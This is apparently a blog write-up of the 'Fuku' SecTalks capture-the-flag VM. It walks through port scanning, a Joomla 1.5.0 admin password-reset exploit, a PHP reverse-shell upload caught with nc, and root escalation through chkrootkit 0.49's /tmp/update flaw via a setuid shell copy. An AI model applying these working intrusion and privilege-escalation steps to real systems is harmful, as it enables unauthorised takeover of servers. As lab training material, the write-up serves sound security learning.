published on in writeup
tags: sectalks

BNE0x02 - Fuku

Fuku CTF

Fuku (pronounced “far queue”) CTF is designed to fuck with people.

There are a few flag.txt files to grab. The final one is in the /root/ directory. However, the ultimate goal is to get a root shell.

Scenario

“Bull was pissed when you broke into his Minotaur box. He has taken precautions with another website that he is hosting, implementing IDS, whitelisting, and obfuscation techniques. He is now taunting hackers to try and hack him, believing himself to be safe. It is up to you to put him in his place.”

Hints

Some scripting will probably be needed to find a useful port. If the machine seems to go down after a while, it probably hasn’t. This CTF isn’t called Fuku for nothing!

This VM was supremely fuckin annoying, as its IP address changes at regular intervals :)

We first find it at 192.168.56.102. So let’s port scan it.

[email protected]:~# nmap -n -p- 192.168.56.102
1/tcp     open  tcpmux
2/tcp     open  compressnet
3/tcp     open  compressnet
4/tcp     open  unknown
5/tcp     open  unknown
6/tcp     open  unknown
7/tcp     open  echo
8/tcp     open  unknown
9/tcp     open  discard
10/tcp    open  unknown
[...snip...]
65526/tcp open  unknown
65527/tcp open  unknown
65528/tcp open  unknown
65529/tcp open  unknown
65530/tcp open  unknown
65531/tcp open  unknown
65532/tcp open  unknown
65533/tcp open  unknown
65534/tcp open  unknown
65535/tcp open  unknown

Every mother-humping port appears open!

[email protected]:~# nc 192.168.56.102 80
HTTP/1.0 200 OK
Server: Apache/2.4.0 (Ubuntu)

<html>
<body>
FUKU!</body>
</html>

[email protected]:~# nc 192.168.56.102 8080
HTTP/1.0 200 OK
Server: Apache/2.4.2 (Ubuntu)

<html>
<body>
FUKU!</body>
</html>

[email protected]:~# nc 192.168.56.102 1234
HTTP/1.0 200 OK
Server: Apache/2.4.0 (Ubuntu)

<html>
<body>
FUKU!</body>
</html>

I suspect this may be some iptables magic, where it redirects every port to one on which Apache is listening. I manually checked a few common ports to see if anything was hidding, all I found was 22.

[email protected]:~# nc 192.168.56.102 22
SSH-2.0-OpenSSH_6.7p1 Ubuntu-5ubuntu1

Protocol mismatch.

I figured the easiest way to find something different between the ports, was to fetch the content of each one and compare the data sizes or something.

#!/bin/bash

for i in {1..65535}; do

	wget 192.168.56.131:$i -q -O $i -t 1 &

done

Be warned - this pretty much bricked my laptop :D and obviously half way through the scan the IP address changed!!! Eventually, I got some results.

[email protected]:~/fuku# ls -lS | head
total 256612
-rw-r--r-- 1 root root 14179 Apr 15 20:06 13370
-rw-r--r-- 1 root root    58 Apr 15 20:06 22
-rw-r--r-- 1 root root    37 Apr 15 20:06 1
-rw-r--r-- 1 root root    37 Apr 15 20:06 10
-rw-r--r-- 1 root root    37 Apr 15 20:06 100
-rw-r--r-- 1 root root    37 Apr 15 20:06 10000
-rw-r--r-- 1 root root    37 Apr 15 20:06 10001
-rw-r--r-- 1 root root    37 Apr 15 20:06 10002

Reading the dump for port 13370, we can see this is an installation of Jooma. We can hop over in a browser for confirmation, and we see a lovely Japanese Rick Roll rendition.

Joomla

The version of Joomla installed is 1.5.0, which has a remote admin password change vulnerability. So we can navigate to /index.php?option=com_user&view=reset&layout=confirm, pop a ' in the text box and we’re free to set any new password we wish.

We can then navigate to /administrator and log in with our new creds; then get a PHP shell by uploading a backdoor into the template source code and requesting the page.

I just used /usr/share/webshells/php/php-reverse-shell.php for this.

[email protected]:~/fuku# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.124] 40273
haha! FUKU! Only root can run that command.
 05:38:31 up  1:14,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
haha! FUKU! Only root can run that command.
/bin/sh: 0: can't access tty; job control turned off
$ id
haha! FUKU! Only root can run that command.

It seems there’s some limitation going on with what commands we can run, which might get interesting.

Flag 1

$ cat /var/www/html/flag.txt
Did you find this flag by guessing? Or possibly by looking in the robots.txt file?
Maybe you found it after getting a shell, by using a command like "find / -name flag.txt" ?
Random keyboard smash: J7&fVbh2kTy[JgS"98$vF4#;>mGcT

Priv Esc

$ ps aux
root      1442  0.0  0.5   5732  2744 ?        S    04:24   0:00 /bin/bash /root/chkrootkit-0.49/run_chkrootkit

After a quick Google, we learn that there’s a pretty dumb vulnerability in this version of chkrootkit. It will basically execute /tmp/update as root. All we must do is place a script/binary there.

$ echo "#!/bin/sh">>update
$ echo "cp /bin/sh /tmp/sh">>update
$ echo "chmod 7777 /tmp/sh">>update
$ chmod +x update

A few minutes later…

-rwsrwsrwt 1 root     root     112204 Apr 16 06:04 sh

$ ./sh
cd /root
ls -l

-rw------- 1 root root       122 Jan  1  1970 flag.txt

cat flag.txt
Yep, this is a flag. It's worth over 9000 Internet points!
Random keyboard smash: lkhI6u%RdFEtDjJKIuuiI7i&*iuGf)8$d4gfh%4